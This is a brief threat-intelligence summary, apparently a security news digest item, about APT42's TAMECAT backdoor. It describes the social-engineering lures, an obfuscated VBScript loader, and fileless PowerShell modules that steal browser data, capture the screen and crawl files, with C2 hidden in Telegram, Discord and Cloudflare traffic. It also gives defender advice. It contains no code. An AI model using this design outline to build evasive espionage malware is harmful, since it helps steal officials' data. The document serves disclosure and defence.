A sophisticated Iranian state-sponsored espionage campaign attributed to APT42 has used patient social engineering to compromise senior defense and government officials before deploying a modular PowerShell backdoor called TAMECAT. TAMECAT operates primarily in memory with modules for browser data theft, screen capture, file crawling, hardcoded AES-256 configuration, and Telegram-based C2 over channels like Cloudflare, Discord, and WebDAV, making detection and attribution more difficult. #TAMECAT #APT42
Keypoints
- APT42 targets senior defense and government officials using long-term social engineering and trusted platforms like WhatsApp.
- Infection begins with an obfuscated VBScript loader that performs antivirus checks and conditionally launches PowerShell or curl.
- TAMECAT is a modular, fileless PowerShell backdoor with browser, screen capture, and FileCrawler modules for intelligence collection.
- The malware uses a hardcoded 256-bit AES key for encryption and blends C2 traffic through Cloudflare Workers, Discord, Telegram, and WebDAV.
- Defenders should monitor PowerShell activity and scrutinize traffic to trusted services such as Telegram and Cloudflare for signs of compromise.
Read More: https://securityonline.info/tamecat-exposed-apt42s-fileless-backdoor-targets-defense-chiefs/